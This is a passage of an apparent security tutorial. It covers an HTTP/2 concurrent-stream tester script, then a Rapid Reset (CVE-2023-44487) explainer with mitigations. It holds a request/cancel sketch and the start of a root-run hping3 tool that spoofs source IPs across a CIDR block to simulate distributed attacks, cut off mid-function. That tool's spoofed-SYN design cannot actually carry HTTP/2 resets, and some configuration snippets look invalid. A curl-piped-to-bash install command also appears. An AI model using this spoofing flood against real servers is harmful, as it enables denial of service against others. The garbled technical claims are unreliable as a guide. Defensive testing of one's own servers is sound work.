Reverse Proxies and Load Balancers:

  • HAProxy: No default limit (should be explicitly configured)
  • Envoy: 100 (configurable via max_concurrent_streams)
  • Traefik: 250 (configurable via maxConcurrentStreams)

CDN and Cloud Services:

  • CloudFlare: 128 (managed automatically)
  • AWS ALB: 128 (managed automatically)
  • Azure Front Door: 100 (managed automatically)

4. The Stream Limit Testing Script

The following Python script tests your server’s maximum concurrent streams using the h2 library. This script will:

  • Connect to your HTTP/2 server
  • Read the advertised SETTINGS_MAX_CONCURRENT_STREAMS value
  • Attempt to open more streams than the advertised limit
  • Verify that the server actually enforces the limit
  • Provide detailed results and recommendations

4.1. Prerequisites

Install the required Python libraries:

pip3 install h2 hyper --break-system-packages

Verify installation:

python3 -c "import h2; print(f'h2 version: {h2.__version__}')"

4.2. Complete Script

Save the following as http2_stream_limit_tester.py:

#!/usr/bin/env python3
"""
HTTP/2 Maximum Concurrent Streams Tester

Tests the SETTINGS_MAX_CONCURRENT_STREAMS limit on HTTP/2 servers
and attempts to exceed it to verify enforcement.

Usage:
    python3 http2_stream_limit_tester.py --host example.com --port 443

Requirements:
    pip3 install h2 hyper --break-system-packages
"""

import argparse
import socket
import ssl
import time
from typing import Dict, List, Optional, Tuple
from dataclasses import dataclass, field

try:
    from h2.connection import H2Connection
    from h2.config import H2Configuration
    from h2.events import (
        RemoteSettingsChanged,
        StreamEnded,
        DataReceived,
        StreamReset,
        WindowUpdated,
        SettingsAcknowledged,
        ResponseReceived
    )
    from h2.exceptions import ProtocolError
except ImportError:
    print("Error: h2 library not installed")
    print("Install with: pip3 install h2 hyper --break-system-packages")
    exit(1)


@dataclass
class StreamLimitTestResults:
    """Results from stream limit testing"""
    advertised_max_streams: Optional[int] = None
    actual_max_streams: int = 0
    successful_streams: int = 0
    failed_streams: int = 0
    reset_streams: int = 0
    enforcement_detected: bool = False
    test_duration: float = 0.0
    server_settings: Dict = field(default_factory=dict)
    errors: List[str] = field(default_factory=list)


class HTTP2StreamLimitTester:
    """Test HTTP/2 server stream limits"""

    def __init__(
        self,
        host: str,
        port: int = 443,
        path: str = "/",
        use_tls: bool = True,
        timeout: int = 30,
        verbose: bool = False
    ):
        self.host = host
        self.port = port
        self.path = path
        self.use_tls = use_tls
        self.timeout = timeout
        self.verbose = verbose

        self.socket: Optional[socket.socket] = None
        self.h2_conn: Optional[H2Connection] = None
        self.server_max_streams: Optional[int] = None
        self.active_streams: Dict[int, dict] = {}

    def connect(self) -> bool:
        """Establish connection to the server"""
        try:
            # Create socket
            self.socket = socket.create_connection(
                (self.host, self.port),
                timeout=self.timeout
            )

            # Wrap with TLS if needed
            if self.use_tls:
                context = ssl.create_default_context()
                context.check_hostname = True
                context.verify_mode = ssl.CERT_REQUIRED

                # Set ALPN protocols for HTTP/2
                context.set_alpn_protocols(['h2', 'http/1.1'])

                self.socket = context.wrap_socket(
                    self.socket,
                    server_hostname=self.host
                )

                # Verify HTTP/2 was negotiated
                negotiated_protocol = self.socket.selected_alpn_protocol()
                if negotiated_protocol != 'h2':
                    raise Exception(f"HTTP/2 not negotiated. Got: {negotiated_protocol}")

                if self.verbose:
                    print(f"TLS connection established (ALPN: {negotiated_protocol})")

            # Initialize HTTP/2 connection
            config = H2Configuration(client_side=True)
            self.h2_conn = H2Connection(config=config)
            self.h2_conn.initiate_connection()

            # Send connection preface
            self.socket.sendall(self.h2_conn.data_to_send())

            # Receive server settings
            self._receive_data()

            if self.verbose:
                print(f"HTTP/2 connection established to {self.host}:{self.port}")

            return True

        except Exception as e:
            if self.verbose:
                print(f"Connection failed: {e}")
            return False

    def _receive_data(self, timeout: Optional[float] = None) -> List:
        """Receive and process data from server"""
        if timeout:
            self.socket.settimeout(timeout)
        else:
            self.socket.settimeout(self.timeout)

        events = []
        try:
            data = self.socket.recv(65536)
            if not data:
                return events

            events_received = self.h2_conn.receive_data(data)

            for event in events_received:
                events.append(event)

                if isinstance(event, RemoteSettingsChanged):
                    self._handle_settings(event)
                elif isinstance(event, ResponseReceived):
                    if self.verbose:
                        print(f"  Stream {event.stream_id}: Response received")
                elif isinstance(event, DataReceived):
                    if self.verbose:
                        print(f"  Stream {event.stream_id}: Data received ({len(event.data)} bytes)")
                elif isinstance(event, StreamEnded):
                    if self.verbose:
                        print(f"  Stream {event.stream_id}: Ended normally")
                    if event.stream_id in self.active_streams:
                        self.active_streams[event.stream_id]['ended'] = True
                elif isinstance(event, StreamReset):
                    if self.verbose:
                        print(f"  Stream {event.stream_id}: Reset (error code: {event.error_code})")
                    if event.stream_id in self.active_streams:
                        self.active_streams[event.stream_id]['reset'] = True

            # Send any pending data
            data_to_send = self.h2_conn.data_to_send()
            if data_to_send:
                self.socket.sendall(data_to_send)

        except socket.timeout:
            pass
        except Exception as e:
            if self.verbose:
                print(f"Error receiving data: {e}")

        return events

    def _handle_settings(self, event: RemoteSettingsChanged):
        """Handle server settings"""
        for setting, value in event.changed_settings.items():
            setting_name = setting.name if hasattr(setting, 'name') else str(setting)

            if self.verbose:
                print(f"  Server setting: {setting_name} = {value}")

            # Check for MAX_CONCURRENT_STREAMS
            if 'MAX_CONCURRENT_STREAMS' in setting_name:
                self.server_max_streams = value
                if self.verbose:
                    print(f"Server advertises max concurrent streams: {value}")

    def send_stream_request(self, stream_id: int) -> bool:
        """Send a GET request on a specific stream"""
        try:
            headers = [
                (':method', 'GET'),
                (':path', self.path),
                (':scheme', 'https' if self.use_tls else 'http'),
                (':authority', self.host),
                ('user-agent', 'HTTP2-Stream-Limit-Tester/1.0'),
            ]

            self.h2_conn.send_headers(stream_id, headers, end_stream=True)
            data_to_send = self.h2_conn.data_to_send()

            if data_to_send:
                self.socket.sendall(data_to_send)

            self.active_streams[stream_id] = {
                'sent': time.time(),
                'ended': False,
                'reset': False
            }

            return True

        except ProtocolError as e:
            if self.verbose:
                print(f"  Stream {stream_id}: Protocol error - {e}")
            return False
        except Exception as e:
            if self.verbose:
                print(f"  Stream {stream_id}: Failed to send - {e}")
            return False

    def test_concurrent_streams(
        self,
        max_streams_to_test: int = 200,
        batch_size: int = 10,
        delay_between_batches: float = 0.1
    ) -> StreamLimitTestResults:
        """
        Test maximum concurrent streams by opening multiple streams

        Args:
            max_streams_to_test: Maximum number of streams to attempt
            batch_size: Number of streams to open per batch
            delay_between_batches: Delay in seconds between batches
        """
        results = StreamLimitTestResults()
        start_time = time.time()

        print(f"\nTesting HTTP/2 Stream Limits:")
        print(f"  Target: {self.host}:{self.port}")
        print(f"  Max streams to test: {max_streams_to_test}")
        print(f"  Batch size: {batch_size}")
        print("=" * 60)

        try:
            # Connect and get initial settings
            if not self.connect():
                results.errors.append("Failed to establish connection")
                return results

            results.advertised_max_streams = self.server_max_streams

            if self.server_max_streams:
                print(f"\nServer advertised limit: {self.server_max_streams} concurrent streams")
            else:
                print(f"\nServer did not advertise MAX_CONCURRENT_STREAMS limit")

            # Start opening streams in batches
            stream_id = 1  # HTTP/2 client streams use odd numbers
            streams_opened = 0

            while streams_opened < max_streams_to_test:
                batch_count = min(batch_size, max_streams_to_test - streams_opened)

                print(f"\nOpening batch of {batch_count} streams (total: {streams_opened + batch_count})...")

                for _ in range(batch_count):
                    if self.send_stream_request(stream_id):
                        results.successful_streams += 1
                        streams_opened += 1
                    else:
                        results.failed_streams += 1

                    stream_id += 2  # Increment by 2 (odd numbers only)

                # Process any responses
                self._receive_data(timeout=0.5)

                # Check for resets
                reset_count = sum(1 for s in self.active_streams.values() if s.get('reset', False))
                if reset_count > results.reset_streams:
                    new_resets = reset_count - results.reset_streams
                    results.reset_streams = reset_count
                    print(f"  WARNING: {new_resets} stream(s) were reset by server")

                    # If we're getting lots of resets, enforcement is happening
                    if reset_count > (results.successful_streams * 0.1):
                        results.enforcement_detected = True
                        print(f"  Stream limit enforcement detected")

                # Small delay between batches
                if delay_between_batches > 0 and streams_opened < max_streams_to_test:
                    time.sleep(delay_between_batches)

            # Final data reception
            print(f"\nWaiting for final responses...")
            for _ in range(5):
                self._receive_data(timeout=1.0)

            # Calculate actual max streams achieved
            results.actual_max_streams = results.successful_streams - results.reset_streams

        except Exception as e:
            results.errors.append(f"Test error: {str(e)}")
            if self.verbose:
                import traceback
                traceback.print_exc()

        finally:
            results.test_duration = time.time() - start_time
            self.close()

        return results

    def display_results(self, results: StreamLimitTestResults):
        """Display test results"""
        print("\n" + "=" * 60)
        print("STREAM LIMIT TEST RESULTS")
        print("=" * 60)

        print(f"\nServer Configuration:")
        print(f"  Advertised max streams:  {results.advertised_max_streams or 'Not specified'}")

        print(f"\nTest Statistics:")
        print(f"  Successful stream opens: {results.successful_streams}")
        print(f"  Failed stream opens:     {results.failed_streams}")
        print(f"  Streams reset by server: {results.reset_streams}")
        print(f"  Actual max achieved:     {results.actual_max_streams}")
        print(f"  Test duration:           {results.test_duration:.2f}s")

        print(f"\nEnforcement:")
        if results.enforcement_detected:
            print(f"  Stream limit enforcement: DETECTED")
        else:
            print(f"  Stream limit enforcement: NOT DETECTED")

        print("\n" + "=" * 60)
        print("ASSESSMENT")
        print("=" * 60)

        # Provide recommendations
        if results.advertised_max_streams and results.advertised_max_streams > 128:
            print(f"\nWARNING: Advertised limit ({results.advertised_max_streams}) exceeds recommended maximum (128)")
            print("  Consider reducing http2_max_concurrent_streams")
        elif results.advertised_max_streams and results.advertised_max_streams <= 128:
            print(f"\nAdvertised limit ({results.advertised_max_streams}) is within recommended range")

        if not results.enforcement_detected and results.actual_max_streams > 150:
            print(f"\nWARNING: Opened {results.actual_max_streams} streams without enforcement")
            print("  Server may be vulnerable to stream exhaustion attacks")
        elif results.enforcement_detected:
            print(f"\nServer actively enforces stream limits")
            print("  Stream limit protection is working correctly")

        if results.errors:
            print(f"\nErrors encountered:")
            for error in results.errors:
                print(f"  {error}")

        print("=" * 60 + "\n")

    def close(self):
        """Close the connection"""
        try:
            if self.h2_conn:
                self.h2_conn.close_connection()
                if self.socket:
                    data_to_send = self.h2_conn.data_to_send()
                    if data_to_send:
                        self.socket.sendall(data_to_send)

            if self.socket:
                self.socket.close()

            if self.verbose:
                print("Connection closed")
        except Exception as e:
            if self.verbose:
                print(f"Error closing connection: {e}")


def main():
    parser = argparse.ArgumentParser(
        description='Test HTTP/2 server maximum concurrent streams',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  # Basic test
  python3 http2_stream_limit_tester.py --host example.com

  # Test with custom parameters
  python3 http2_stream_limit_tester.py --host example.com --max-streams 300 --batch 20

  # Verbose output
  python3 http2_stream_limit_tester.py --host example.com --verbose

  # Test specific path
  python3 http2_stream_limit_tester.py --host example.com --path /api/health

  # Test non-TLS HTTP/2 (h2c)
  python3 http2_stream_limit_tester.py --host localhost --port 8080 --no-tls

Prerequisites:
  pip3 install h2 hyper --break-system-packages
        """
    )

    parser.add_argument('--host', required=True, help='Target hostname')
    parser.add_argument('--port', type=int, default=443, help='Target port (default: 443)')
    parser.add_argument('--path', default='/', help='Request path (default: /)')
    parser.add_argument('--no-tls', action='store_true', help='Disable TLS (for h2c testing)')
    parser.add_argument('--max-streams', type=int, default=200,
                       help='Maximum streams to test (default: 200)')
    parser.add_argument('--batch', type=int, default=10,
                       help='Streams per batch (default: 10)')
    parser.add_argument('--delay', type=float, default=0.1,
                       help='Delay between batches in seconds (default: 0.1)')
    parser.add_argument('--timeout', type=int, default=30,
                       help='Connection timeout in seconds (default: 30)')
    parser.add_argument('--verbose', action='store_true', help='Enable verbose output')

    args = parser.parse_args()

    print("=" * 60)
    print("HTTP/2 Maximum Concurrent Streams Tester")
    print("=" * 60)

    tester = HTTP2StreamLimitTester(
        host=args.host,
        port=args.port,
        path=args.path,
        use_tls=not args.no_tls,
        timeout=args.timeout,
        verbose=args.verbose
    )

    try:
        results = tester.test_concurrent_streams(
            max_streams_to_test=args.max_streams,
            batch_size=args.batch,
            delay_between_batches=args.delay
        )

        tester.display_results(results)

    except KeyboardInterrupt:
        print("\n\nTest interrupted by user")
    except Exception as e:
        print(f"\nFatal error: {e}")
        if args.verbose:
            import traceback
            traceback.print_exc()


if __name__ == '__main__':
    main()

5. Using the Script

5.1. Basic Usage

Test your server with default settings:

python3 http2_stream_limit_tester.py --host example.com

5.2. Advanced Examples

Test with increased stream count:

python3 http2_stream_limit_tester.py --host example.com --max-streams 300 --batch 20

Verbose output for debugging:

python3 http2_stream_limit_tester.py --host example.com --verbose

Test specific API endpoint:

python3 http2_stream_limit_tester.py --host api.example.com --path /v1/health

Test non-TLS HTTP/2 (h2c):

python3 http2_stream_limit_tester.py --host localhost --port 8080 --no-tls

Gradual escalation test:

# Start conservative
python3 http2_stream_limit_tester.py --host example.com --max-streams 50

# Increase if server handles well
python3 http2_stream_limit_tester.py --host example.com --max-streams 100

# Push to limits
python3 http2_stream_limit_tester.py --host example.com --max-streams 200

Fast burst test:

python3 http2_stream_limit_tester.py --host example.com --max-streams 150 --batch 30 --delay 0.01

Slow ramp test:

python3 http2_stream_limit_tester.py --host example.com --max-streams 200 --batch 5 --delay 0.5

6. Understanding the Results

The script provides detailed output including:

  1. Advertised max streams: What the server claims to support
  2. Successful stream opens: How many streams were successfully created
  3. Failed stream opens: Streams that failed to open
  4. Streams reset by server: Streams terminated by the server (enforcement)
  5. Actual max achieved: The real concurrent stream limit

6.1. Example Output

Testing HTTP/2 Stream Limits:
  Target: example.com:443
  Max streams to test: 200
  Batch size: 10
============================================================

Server advertised limit: 128 concurrent streams

Opening batch of 10 streams (total: 10)...
Opening batch of 10 streams (total: 20)...
Opening batch of 10 streams (total: 130)...
  WARNING: 5 stream(s) were reset by server
  Stream limit enforcement detected

============================================================
STREAM LIMIT TEST RESULTS
============================================================

Server Configuration:
  Advertised max streams:  128

Test Statistics:
  Successful stream opens: 130
  Failed stream opens:     0
  Streams reset by server: 5
  Actual max achieved:     125
  Test duration:           3.45s

Enforcement:
  Stream limit enforcement: DETECTED

============================================================
ASSESSMENT
============================================================

Advertised limit (128) is within recommended range
Server actively enforces stream limits
  Stream limit protection is working correctly
============================================================

7. Interpreting Different Scenarios

7.1. Scenario 1: Proper Enforcement

Advertised max streams:  100
Successful stream opens: 105
Streams reset by server: 5
Actual max achieved:     100
Stream limit enforcement: DETECTED

Analysis: Server properly enforces the limit. Configuration is working exactly as expected.

7.2. Scenario 2: No Enforcement

Advertised max streams:  128
Successful stream opens: 200
Streams reset by server: 0
Actual max achieved:     200
Stream limit enforcement: NOT DETECTED

Analysis: Server accepts far more streams than advertised. This is a potential vulnerability that should be investigated.

7.3. Scenario 3: No Advertised Limit

Advertised max streams:  Not specified
Successful stream opens: 200
Streams reset by server: 0
Actual max achieved:     200
Stream limit enforcement: NOT DETECTED

Analysis: Server does not advertise or enforce limits. High risk configuration that requires immediate remediation.

7.4. Scenario 4: Conservative Limit

Advertised max streams:  50
Successful stream opens: 55
Streams reset by server: 5
Actual max achieved:     50
Stream limit enforcement: DETECTED

Analysis: Very conservative limit. Good for security but may impact performance for legitimate high-throughput applications.

8. Monitoring During Testing

8.1. Server Side Monitoring

While running tests, monitor your server for resource utilization and connection metrics.

Monitor connection states:

netstat -an | grep :443 | awk '{print $6}' | sort | uniq -c

Count active connections:

netstat -an | grep ESTABLISHED | wc -l

Count SYN_RECV connections:

netstat -an | grep SYN_RECV | wc -l

Monitor system resources:

top -l 1 | head -10

8.2. Web Server Specific Monitoring

For Nginx, watch active connections:

watch -n 1 'curl -s http://localhost/nginx_status | grep Active'

For Apache, monitor server status:

watch -n 1 'curl -s http://localhost/server-status | grep requests'

Check HTTP/2 connections:

netstat -an | grep :443 | grep ESTABLISHED | wc -l

Monitor stream counts (if your server exposes this metric):

curl -s http://localhost:9090/metrics | grep http2_streams

Monitor CPU and memory:

top -l 1 | grep -E "CPU|PhysMem"

Check file descriptors:

lsof -i :443 | wc -l

8.3. Using tcpdump

Monitor packets in real time:

# Watch SYN packets
sudo tcpdump -i en0 'tcp[tcpflags] & tcp-syn != 0' -n

# Watch RST packets
sudo tcpdump -i en0 'tcp[tcpflags] & tcp-rst != 0' -n

# Watch specific host and port
sudo tcpdump -i en0 host example.com and port 443 -n

# Save to file for later analysis
sudo tcpdump -i en0 -w test_capture.pcap host example.com

8.4. Using Wireshark

For detailed packet analysis:

# Install Wireshark
brew install --cask wireshark

# Run Wireshark
sudo wireshark

# Or use tshark for command line
tshark -i en0 -f "host example.com"

9. Remediation Steps

If your tests reveal issues, apply these configuration fixes:

9.1. Nginx Configuration

http {
    # Set conservative concurrent stream limit
    http2_max_concurrent_streams 100;

    # Additional protections
    http2_recv_timeout 10s;
    http2_idle_timeout 30s;
    http2_max_field_size 16k;
    http2_max_header_size 32k;
}

9.2. Apache Configuration

Set in httpd.conf or virtual host configuration:

# Set maximum concurrent streams
H2MaxSessionStreams 100

# Additional HTTP/2 settings
H2StreamTimeout 10
H2MinWorkers 10
H2MaxWorkers 150
H2StreamMaxMemSize 65536

9.3. HAProxy Configuration

defaults
    timeout http-request 10s
    timeout http-keep-alive 10s

frontend fe_main
    bind :443 ssl crt /path/to/cert.pem alpn h2,http/1.1

    # Limit streams per connection
    http-request track-sc0 src table connection_limit
    http-request deny if { sc_conn_cur(0) gt 100 }

9.4. Envoy Configuration

static_resources:
  listeners:
  - name: listener_0
    address:
      socket_address:
        address: 0.0.0.0
        port_value: 443
    filter_chains:
    - filters:
      - name: envoy.filters.network.http_connection_manager
        typed_config:
          "@type": type.googleapis.com/envoy.extensions.filters.network.http_connection_manager.v3.HttpConnectionManager
          http2_protocol_options:
            max_concurrent_streams: 100
            initial_stream_window_size: 65536
            initial_connection_window_size: 1048576

9.5. Caddy Configuration

example.com {
    encode gzip

    # HTTP/2 settings
    protocol {
        experimental_http3
        max_concurrent_streams 100
    }

    reverse_proxy localhost:8080
}

10. Combining with Rapid Reset Testing

You can use both the stream limit tester and the Rapid Reset tester together for comprehensive HTTP/2 security assessment:

# Step 1: Test stream limits
python3 http2_stream_limit_tester.py --host example.com

# Step 2: Test rapid reset with IP spoofing
sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --cidr 192.168.1.0/24 \
    --packets 1000

# Step 3: Re-test stream limits to verify no degradation
python3 http2_stream_limit_tester.py --host example.com

11. Security Best Practices

11.1. Configuration Guidelines

  1. Set explicit limits: Never rely on default values
  2. Use conservative values: 100-128 streams is the recommended range
  3. Monitor enforcement: Regularly verify that limits are actually being enforced
  4. Document settings: Maintain records of your stream limit configuration
  5. Test after changes: Always test after configuration modifications

11.2. Defense in Depth

Stream limits should be one layer in a comprehensive security strategy:

  1. Stream limits: Prevent excessive concurrent streams per connection
  2. Connection limits: Limit total connections per IP address
  3. Request rate limiting: Throttle requests per second
  4. Resource quotas: Set memory and CPU limits
  5. WAF/DDoS protection: Use cloud-based or on-premise DDoS mitigation

11.3. Regular Testing Schedule

Establish a regular testing schedule:

  • Weekly: Automated basic stream limit tests
  • Monthly: Comprehensive security testing including Rapid Reset
  • After changes: Always test after configuration or infrastructure changes
  • Quarterly: Full security audit including penetration testing

12. Troubleshooting

12.1. Common Errors

Error: “SSL: CERTIFICATE_VERIFY_FAILED”

This occurs when testing against servers with self-signed certificates. For testing purposes only, you can modify the script to skip certificate verification (not recommended for production testing).

Error: “h2 library not installed”

Install the required library:

pip3 install h2 hyper --break-system-packages

Error: “Connection refused”

Verify the port is open:

nc -vz example.com 443

Check if HTTP/2 is enabled:

curl -I --http2 https://example.com

Error: “HTTP/2 not negotiated”

The server may not support HTTP/2. Verify with:

curl -I --http2 https://example.com | grep -i http/2

12.2. No Streams Being Reset

If streams are not being reset despite exceeding the advertised limit:

  • Server may not be enforcing limits properly
  • Configuration may not have been applied (restart required)
  • Server may be using a different enforcement mechanism
  • Limits may be set at a different layer (load balancer vs web server)

12.3. High Failure Rate

If many streams fail to open:

  • Network connectivity issues
  • Firewall blocking requests
  • Server resource exhaustion
  • Rate limiting triggering prematurely

13. Understanding the Attack Surface

When testing your infrastructure, consider all HTTP/2 endpoints:

  1. Web servers: Nginx, Apache, IIS
  2. Load balancers: HAProxy, Envoy, ALB
  3. API gateways: Kong, Tyk, AWS API Gateway
  4. CDN endpoints: CloudFlare, Fastly, Akamai
  5. Reverse proxies: Traefik, Caddy

13.1. Testing Strategy

Test at multiple layers:

# Test CDN edge
python3 http2_stream_limit_tester.py --host cdn.example.com

# Test load balancer directly
python3 http2_stream_limit_tester.py --host lb.example.com

# Test origin server
python3 http2_stream_limit_tester.py --host origin.example.com

14. Conclusion

Testing your HTTP/2 maximum concurrent streams configuration is essential for maintaining a secure and performant web infrastructure. This tool allows you to:

  • Verify that your server advertises appropriate stream limits
  • Confirm that advertised limits are actually enforced
  • Identify misconfigurations before they can be exploited
  • Tune performance while maintaining security

Regular testing, combined with proper configuration and monitoring, will help protect your infrastructure against HTTP/2-based attacks while maintaining optimal performance for legitimate users.


This guide and testing script are provided for educational and defensive security purposes only. Always obtain proper authorization before testing systems you do not own.


Testing Your Website for HTTP/2 Rapid Reset Vulnerabilities from macOS

Introduction

In October 2023, a critical zero day vulnerability in the HTTP/2 protocol was publicly disclosed, after attackers had been exploiting it in the wild since August 2023. The flaw affected virtually every HTTP/2 capable web server and proxy. Known as HTTP/2 Rapid Reset (CVE-2023-44487), this vulnerability enabled attackers to launch devastating Distributed Denial of Service (DDoS) attacks with minimal resources. Google reported mitigating the largest DDoS attack ever recorded at the time (398 million requests per second) leveraging this technique.

Understanding this vulnerability and knowing how to test your infrastructure against it is crucial for maintaining a secure and resilient web presence. This guide provides a flexible testing tool specifically designed for macOS that uses hping3 for packet crafting with CIDR based source IP address spoofing capabilities.

What is HTTP/2 Rapid Reset?

The HTTP/2 Protocol Foundation

HTTP/2 introduced multiplexing, allowing multiple streams (requests/responses) to be sent concurrently over a single TCP connection. Each stream has a unique identifier and can be independently managed. To cancel a stream, HTTP/2 uses the RST_STREAM frame, which immediately terminates the stream and signals that no further processing is needed.

The Vulnerability Mechanism

The HTTP/2 Rapid Reset attack exploits the asymmetry between client cost and server cost:

  • Client cost: Sending a request followed immediately by a RST_STREAM frame is computationally trivial
  • Server cost: Processing the incoming request (parsing headers, routing, backend queries) consumes significant resources before the cancellation is received

An attacker can:

  1. Open an HTTP/2 connection
  2. Send thousands of requests with incrementing stream IDs
  3. Immediately cancel each request with RST_STREAM frames
  4. Repeat this cycle at extremely high rates

The server receives these requests and begins processing them. Even though the cancellation arrives milliseconds later, the server has already invested CPU, memory, and I/O resources. By sending millions of request cancel pairs per second, attackers can exhaust server resources with minimal bandwidth.
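
The h2 library makes the unit of the attack, a request immediately followed by its cancellation, easy to see. A minimal sketch of one request/cancel pair (no socket involved; example.com is a placeholder, and attack traffic must only ever be sent to systems you own):

from h2.config import H2Configuration
from h2.connection import H2Connection
from h2.errors import ErrorCodes

conn = H2Connection(H2Configuration(client_side=True))
conn.initiate_connection()

headers = [(":method", "GET"), (":path", "/"),
           (":scheme", "https"), (":authority", "example.com")]

stream_id = conn.get_next_available_stream_id()
conn.send_headers(stream_id, headers)            # cheap for the client...
conn.reset_stream(stream_id, ErrorCodes.CANCEL)  # ...cancelled immediately

# HEADERS + RST_STREAM bytes, ready to be written to a TLS socket;
# the attack repeats this pair at extremely high rates
print(f"{len(conn.data_to_send())} bytes buffered for one request/cancel pair")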

Why It’s So Effective

Traditional rate limiting and DDoS mitigation techniques struggle against Rapid Reset attacks because:

  • Low bandwidth usage: The attack uses minimal data (mostly HTTP/2 frames with small headers)
  • Valid protocol behavior: RST_STREAM is a legitimate HTTP/2 mechanism
  • Connection reuse: Attackers multiplex thousands of streams over relatively few connections
  • Amplification: Each cheap client operation triggers expensive server side processing

How to Guard Against HTTP/2 Rapid Reset

1. Update Your Software Stack

Immediate Priority: Ensure all HTTP/2 capable components are patched:

Web Servers:

  • Nginx 1.25.2+ or 1.24.1+
  • Apache HTTP Server 2.4.58+
  • Caddy 2.7.4+
  • LiteSpeed 6.0.12+

Reverse Proxies and Load Balancers:

  • HAProxy 2.8.2+ or 2.6.15+
  • Envoy 1.27.0+
  • Traefik 2.10.5+

CDN and Cloud Services:

  • CloudFlare (auto patched August 2023)
  • AWS ALB/CloudFront (patched)
  • Azure Front Door (patched)
  • Google Cloud Load Balancer (patched)

Application Servers:

  • Tomcat 10.1.13+, 9.0.80+
  • Jetty 12.0.1+, 11.0.16+, 10.0.16+
  • Node.js 20.8.0+, 18.18.0+

2. Implement Stream Limits

Configure strict limits on HTTP/2 stream behavior:

# Nginx configuration
http2_max_concurrent_streams 128;
http2_recv_timeout 10s;
# Apache HTTP Server
H2MaxSessionStreams 100
H2StreamTimeout 10
# HAProxy configuration
defaults
    timeout http-request 10s
    timeout http-keep-alive 10s

frontend https-in
    option http-use-htx
    http-request track-sc0 src
    http-request deny if { sc_http_req_rate(0) gt 100 }

3. Deploy Rate Limiting

Implement multi layered rate limiting:

Connection level limits:

limit_conn_zone $binary_remote_addr zone=addr:10m;
limit_conn addr 10;  # Max 10 concurrent connections per IP

Request level limits:

limit_req_zone $binary_remote_addr zone=req_limit:10m rate=50r/s;
limit_req zone=req_limit burst=20 nodelay;

Stream cancellation tracking:

# Newer Nginx versions track RST_STREAM rates internally;
# keep stream and header limits tight as well
http2_max_concurrent_streams 100;
http2_max_field_size 16k;
http2_max_header_size 32k;

4. Infrastructure Level Protections

Use a WAF or DDoS Protection Service:

  • CloudFlare (includes Rapid Reset protection)
  • AWS Shield Advanced
  • Azure DDoS Protection Standard
  • Imperva/Akamai

Enable Connection Draining:

# Gracefully handle connection resets
http2_recv_buffer_size 256k;
keepalive_timeout 60s;
keepalive_requests 100;

5. Monitoring and Alerting

Track critical metrics:

  • HTTP/2 stream reset rates
  • Concurrent stream counts per connection
  • Request cancellation patterns
  • CPU and memory usage spikes
  • Unusual traffic patterns from specific IPs

Example Prometheus query:

rate(nginx_http_requests_total{status="499"}[5m]) > 100

6. Consider HTTP/2 Disabling (Temporary Measure)

If you cannot immediately patch:

# Nginx: Disable HTTP/2 temporarily
listen 443 ssl;  # Remove http2 parameter
# Apache: Disable HTTP/2 module
# a2dismod http2

Note: This reduces performance benefits but eliminates the vulnerability.

Testing Script for HTTP/2 Rapid Reset Vulnerabilities on macOS

Below is a parameterized Python script that tests your web servers using hping3 for packet crafting. This script is specifically optimized for macOS and can spoof source IP addresses from a CIDR block to simulate distributed attacks. Note that spoofed packets only reach the target if upstream routers do not apply egress filtering (BCP 38), so run this from a network you control end to end.

Prerequisites for macOS

Installation Steps:

# Install Homebrew (if not already installed)
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"

# Install hping3
brew install hping

Note: This script requires root/sudo privileges for packet crafting and IP spoofing.

The Testing Script

cat > http2rapidresettester_macos.py << 'EOF'

#!/usr/bin/env python3
"""
HTTP/2 Rapid Reset Vulnerability Tester for macOS
Tests web servers for susceptibility to CVE-2023-44487
Uses hping3 for packet crafting with source IP spoofing from CIDR block

Usage:
    sudo python3 http2rapidresettester_macos.py --host example.com --port 443 --cidr 192.168.1.0/24 --packets 1000

Requirements:
    brew install hping
"""

import argparse
import subprocess
import random
import ipaddress
import time
import sys
import os
import platform
from typing import List, Optional

class HTTP2RapidResetTester:
    def __init__(
        self,
        host: str,
        port: int = 443,
        cidr_block: str = None,
        timeout: int = 30,
        verbose: bool = False,
        interface: str = None
    ):
        self.host = host
        self.port = port
        self.cidr_block = cidr_block
        self.timeout = timeout
        self.verbose = verbose
        self.interface = interface
        self.source_ips: List[str] = []

        # Verify running on macOS
        if platform.system() != 'Darwin':
            print("WARNING: This script is optimized for macOS")

        if not self.check_hping3():
            raise RuntimeError("hping3 is not installed. Install with: brew install hping")

        if not self.check_root():
            raise RuntimeError("This script requires root privileges (use sudo)")

        if cidr_block:
            self.generate_source_ips()
            
        if interface:
            self.verify_interface()

    def check_hping3(self) -> bool:
        """Check if hping3 is installed"""
        try:
            result = subprocess.run(
                ['which', 'hping3'],
                capture_output=True,
                text=True,
                timeout=5
            )
            if result.returncode == 0:
                return True

            # Try alternative hping command
            result = subprocess.run(
                ['which', 'hping'],
                capture_output=True,
                text=True,
                timeout=5
            )
            return result.returncode == 0
        except Exception as e:
            print(f"Error checking for hping3: {e}")
            return False

    def check_root(self) -> bool:
        """Check if running with root privileges"""
        return os.geteuid() == 0

    def verify_interface(self):
        """Verify that the specified network interface exists"""
        try:
            result = subprocess.run(
                ['ifconfig', self.interface],
                capture_output=True,
                text=True,
                timeout=5
            )
            if result.returncode != 0:
                raise RuntimeError(f"Network interface '{self.interface}' not found")
            
            if self.verbose:
                print(f"Using network interface: {self.interface}")
                
        except subprocess.TimeoutExpired:
            raise RuntimeError(f"Timeout verifying interface '{self.interface}'")
        except FileNotFoundError:
            raise RuntimeError("ifconfig command not found")

    def generate_source_ips(self):
        """Generate list of IP addresses from CIDR block"""
        try:
            network = ipaddress.ip_network(self.cidr_block, strict=False)
            self.source_ips = [str(ip) for ip in network.hosts()]

            if len(self.source_ips) == 0:
                # Handle /32 or /31 networks
                self.source_ips = [str(ip) for ip in network]

            print(f"Generated {len(self.source_ips)} source IPs from {self.cidr_block}")

        except ValueError as e:
            print(f"Invalid CIDR block: {e}")
            sys.exit(1)

    def get_random_source_ip(self) -> Optional[str]:
        """Get a random IP address from the CIDR block"""
        if not self.source_ips:
            return None
        return random.choice(self.source_ips)

    def get_hping_command(self) -> str:
        """Determine which hping command is available"""
        result = subprocess.run(['which', 'hping3'], capture_output=True, text=True)
        if result.returncode == 0:
            return 'hping3'
        return 'hping'

    def craft_syn_packet(self, source_ip: str, count: int = 1) -> bool:
        """
        Craft TCP SYN packet using hping3

        Args:
            source_ip: Source IP address to spoof
            count: Number of packets to send

        Returns:
            True if successful, False otherwise
        """
        try:
            hping_cmd = self.get_hping_command()
            cmd = [
